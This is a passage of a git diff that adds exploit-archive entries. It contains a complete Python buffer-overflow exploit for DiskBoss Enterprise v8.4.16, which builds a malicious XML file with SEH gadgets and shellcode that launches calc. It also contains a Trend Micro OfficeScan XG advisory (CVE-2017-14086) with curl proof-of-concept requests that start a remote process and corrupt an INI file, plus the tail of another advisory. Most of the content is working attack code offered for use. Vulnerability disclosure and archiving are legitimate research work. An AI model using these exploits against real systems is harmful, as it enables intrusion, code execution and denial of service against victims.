which is affected by this bug was already pulled and is no longer available for public download" +Vendor Reply: "created hotfixes for product improvement." +September 28, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/platforms/windows/local/42918.py b/platforms/windows/local/42918.py new file mode 100755 index 000000000..dfdf2b82a --- /dev/null +++ b/platforms/windows/local/42918.py @@ -0,0 +1,68 @@ +#!/usr/bin/python + +#======================================================================================================================== +# Exploit Author: Touhid M.Shaikh +# Exploit Title: DiskBoss Enterprise v8.4.16 "Import Command" Buffer +Overflow +# Date: 29-09-2017 +# Website: www.touhidshaikh.com +# Contact: https://github.com/touhidshaikh +# Vulnerable Software: DiskBoss Enterprise v8.4.16 +# Vendor Homepage: http://www.diskboss.com +# Version: v8.4.16 +# Software Link: http://www.diskboss.com/downloads.html +# Tested On: Windows 7 x86 +# +# +# To reproduce the exploit: +# 1. right Click, click on Import Command +# 2. select evil.xml , Booom Calc POPED up.. ;) +#======================================================================================================================== + + +import os,struct +import sys + +#offset to eip +junk = "A" * (1560) + +#JMP ESP (QtGui4.dll) +jmp1 = struct.pack('<L',0x651bb77a) + +#NOPS +nops = "\x90" + +#LEA EAX, [ESP+76] +esp = "\x8D\x44\x24\x4c" + +#JMP ESP +jmp2 = "\xFF\xE0" + +#Jump short 5 +nseh = "\x90\x90\xEB\x05" + +#POP POP RET +seh = struct.pack('<L',0x6501DE41) + +#CALC.EXE pop shellcode +shellcode = +"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7" + + +# FINAL PAYLOAD +buf = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 90 + nseh + seh + nops +* 10 + shellcode + + +#FILE +file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + buf + +'\n</classify>' + + +f = open('evil.xml', 'w') +f.write(file) +f.close() + +#GREETZ ---------- +#Taushif(Brother) +#----------------- diff --git a/platforms/windows/webapps/42892.txt b/platforms/windows/webapps/42892.txt new file mode 100755 index 000000000..cbc2a3854 --- /dev/null +++ b/platforms/windows/webapps/42892.txt @@ -0,0 +1,135 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14086-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-START-REMOTE-PROCESS-CODE-EXECUTION-MEM-CORRUPT.txt +[+] ISR: ApparitionSec + + + +Vendor: +================== +www.trendmicro.com + + + +Product: +======== +OfficeScan XG +v11.0 and (12.0)* + + + +Vulnerability Type: +=================== +Unauthorized Start Remote Process Code Execution +Unauthorized Denial Of Service - INI Corruption + +OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. +An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that +manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the +web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. + + + +CVE Reference: +============== +CVE-2017-14086 + + + +Security Issue: +================ +Remote unauthenticated attackers who connect to the OfficeScan XG application can temporarily start the "fcgiOfcDDA.exe" executable +this process will run for short time before dies, server disk space may also be consumed with dump files by making continous HTTP requests. + + +References: +=========== +https://success.trendmicro.com/solution/1118372 + + + +Exploit/POC Start Remote Process Code Execution: +================================================ +c:\> curl -k https://VICTIM-IP:4343/officescan/console/CGI/ + +HTTP response: +403 - Forbidden: Access is denied. +You do not have permission to view this directory or page using the credentials that you supplied + +But, we can access it directly :) + +c:\> curl -v -k https://VICTIM-IP:4343/officescan/console/CGI/fcgiOfcDDA.exe + +HTTP Response: + +500 - Internal server error. +There is a problem with the resource you are looking for, and it cannot be displayed. + +The EXE is called then runs for short time before .DMP is generated. + +fcgiOfcDDA.exe.6808.dmp + +The stored exception information can be accessed via .ecxr. +(568.112c): Unknown exception - code c000000d (first/second chance not available) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll - +eax=00000000 ebx=0014f780 ecx=00000000 edx=00000000 esi=00000002 edi=00000000 +eip=77d9016d esp=0014f730 ebp=0014f7cc iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 +ntdll!NtWaitForMultipleObjects+0x15: + + + +Exploit/POC (Denial Of Service / INI Corruption): +================================================== +[root@localhost /]# curl -v -k https://VICTIM-IP:4343/officescan/CGI/cgiRqUpd.exe +* About to connect() to VICTIM-IP port 4343 +* Trying VICTIM-IP.. connected + + +<HTTP/1.1 200 OK +< Pragma: no-cache +< Content-Type: text/plain;charset=iso-8859-1 +< Server: Microsoft-IIS/7.5 +< X-Powered-By: ASP.NET +< Date: Fri, 02 Jun 2017 18:00:36 GMT +< Connection: close +< Content-Length: 22 + +[INI_UPDATE_SECTION] + + +BOOOM! + + + + +Network Access: +=============== +Remote + + + + +Severity: +========= +High + + + +Disclosure Timeline: +============================= +Vendor Notification: June 2, 2017 +Vendor releases fixes / advisory : September 27, 2017 +September 28, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file